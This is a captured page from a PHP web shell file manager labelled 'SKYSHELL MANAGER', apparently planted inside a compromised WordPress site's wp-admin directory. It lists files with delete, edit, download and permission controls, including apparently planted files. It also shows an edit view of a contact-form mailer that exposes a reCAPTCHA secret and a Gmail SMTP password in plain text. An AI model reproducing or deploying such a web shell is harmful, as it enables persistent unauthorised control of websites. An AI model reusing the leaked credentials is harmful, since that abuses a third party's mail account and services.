📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cont.php
<?php session_start(); use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; // Require PHPMailer files require_once __DIR__ . '/../vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/../vendor/phpmailer/src/SMTP.php'; require_once __DIR__ . '/../vendor/phpmailer/src/Exception.php'; $response = ''; /* |-------------------------------------------------------------------------- | GOOGLE RECAPTCHA SECRET KEY |-------------------------------------------------------------------------- */ $site_secret = '6LfqRCQtAAAAACDNCSUeG_7wnuL-8nJwHKfpeV5m'; /* |-------------------------------------------------------------------------- | ALLOW ONLY POST REQUEST |-------------------------------------------------------------------------- */ if ($_SERVER['REQUEST_METHOD'] !== 'POST') { die("Access denied."); } /* |-------------------------------------------------------------------------- | RATE LIMIT PROTECTION |-------------------------------------------------------------------------- */ if (isset($_SESSION['last_submit'])) { $seconds = time() - $_SESSION['last_submit']; if ($seconds < 10) { die("Please wait before submitting again."); } } $_SESSION['last_submit'] = time(); /* |-------------------------------------------------------------------------- | HONEYPOT SPAM PROTECTION |-------------------------------------------------------------------------- */ if (!empty($_POST['website'])) { die("Spam detected."); } /* |-------------------------------------------------------------------------- | VALIDATE EMAIL |-------------------------------------------------------------------------- */ if (!isset($_POST['email']) || empty(trim($_POST['email']))) { die("Email field is required."); } $email = trim($_POST['email']); if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { die("Invalid email address."); } /* |-------------------------------------------------------------------------- | BLOCK HEADER INJECTION |-------------------------------------------------------------------------- */ if (preg_match("/[\r\n]/", $email)) { die("Invalid input detected."); } /* |-------------------------------------------------------------------------- | BLOCK TEMP EMAILS |-------------------------------------------------------------------------- */ $blocked_domains = [ 'mailinator.com', 'tempmail.com', '10minutemail.com', 'guerrillamail.com' ]; $domain = strtolower(substr(strrchr($email, "@"), 1)); if (in_array($domain, $blocked_domains)) { die("Temporary email addresses are not allowed."); } /* |-------------------------------------------------------------------------- | VERIFY RECAPTCHA |-------------------------------------------------------------------------- */ if (empty($_POST['g-recaptcha-response'])) { die("Captcha required."); } $captcha = $_POST['g-recaptcha-response']; $verify = file_get_contents( "https://www.google.com/recaptcha/api/siteverify?secret=" .$site_secret. "&response=".$captcha ); $captcha_success = json_decode($verify); if (!$captcha_success->success) { die("Captcha verification failed."); } try { /* |-------------------------------------------------------------------------- | SEND EMAIL TO USER |-------------------------------------------------------------------------- */ $mail = new PHPMailer(true); $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'contact@fidelitybazaar.com'; $mail->Password = 'nxdflxmwfwlwibjb'; $mail->setFrom( 'contact@fidelitybazaar.com', 'Fidelitybazaar' ); $mail->addAddress($email); $mail->addReplyTo( 'contact@fidelitybazaar.com', 'Fidelitybazaar' ); $mail->isHTML(true); $mail->Subject = "Contact Replay"; $mail->Body=' <body style="margin:0; padding:0; background-color:#f1f2f5; font-family:Roboto, Arial, sans-serif; color:#1e3557;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0" style="background-color:#f1f2f5; margin:0; padding:0; margin-bottom:30px;"> <tr> <td align="center" style="padding:0; margin:0;"> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background-color:#25826A; padding:40px 0; margin-top:30px;"> <tr><td></td></tr> </table> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background-color:#ffffff; border-radius:6px; max-width:600px; width:100%;"> <tr> <td align="center" style="padding:20px 20px;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" style="padding:20px 0;"> <h3 style="font-size: 22px;">Fidelitybazaar</h3> </td> </tr> </table> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="left" style="font-size:14px; line-height:22px; color:#1e3557;"> <p style="margin:0 0 15px 0;"><b>Hi '.$name.',</b></p> <p style="margin:0 0 15px 0;"> Thank you for reaching out to us through Fidelitybazaar. </p> <p style="margin:0 0 15px 0;"> We have received your message and truly appreciate you taking the time to contact us. Our team is currently reviewing your inquiry, and we will get back to you as soon as possible with the relevant information. </p> <p style="margin:0 0 15px 0;"> If your request is urgent, please feel free to reply to this email or contact us directly using the details provided on our website. </p> <p style="margin:0;"><b>Warm regards,</b><br><b>Fidelitybazaar</b></p> </td> </tr> </table> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:30px;"> <tr> <td align="center" style="font-size:12px; color:#566881;"> <p style="margin:0 0 10px 0;"> You are receiving this email because you contact Fidelitybazaar. </p> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </body>'; $mail->send(); /* |-------------------------------------------------------------------------- | SEND EMAIL TO ADMIN |-------------------------------------------------------------------------- */ $mail2 = new PHPMailer(true); $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'contact@fidelitybazaar.com'; $mail2->Password = 'nxdflxmwfwlwibjb'; $mail2->setFrom( 'contact@fidelitybazaar.com', 'Fidelitybazaar' ); $mail2->addAddress( 'contact@fidelitybazaar.com', 'Fidelitybazaar' ); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body=' <body style="margin:0; padding:0; background-color:#f1f2f5; font-family:Roboto, Arial, sans-serif; color:#1e3557;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0" style="background-color:#f1f2f5; margin:0; padding:0; margin-bottom:30px;"> <tr> <td align="center" style="padding:0; margin:0;"> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background:linear-gradient(80deg, rgb(42,204,222) 0%, rgb(214,83,119) 50%, rgb(130,33,215) 100%); padding:40px 0; margin-top:30px;"> <tr><td></td></tr> </table> <table role="presentation" width="600" border="0" cellspacing="0" cellpadding="0" style="background-color:#ffffff; border-radius:6px; max-width:600px; width:100%;"> <tr> <td align="center" style="padding:20px 20px;"> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" style="padding:20px 0;"> <h3 style="font-size: 22px;">Fidelitybazaar</h3> </td> </tr> </table> <table role="presentation" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="left" style="font-size:14px; line-height:22px; color:#1e3557;"> <p style="margin:0 0 15px 0;"><b>contact details,</b></p> <p style="margin:0 0 15px 0;"> Following user has submitted their contact details: </p> <p style="margin:0 0 15px 0;"> Name: '.$name.' <br> Email: '.$email.' <br> Message: '.$message.' </p> <p style="margin:0;">Regards,<br>Fidelitybazaar</p> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </body>'; $mail2->send(); $response = "Thank you for contact us."; } catch (Exception $e) { $response = "Mailer Error: " . $mail->ErrorInfo; } echo $response; ?>
Save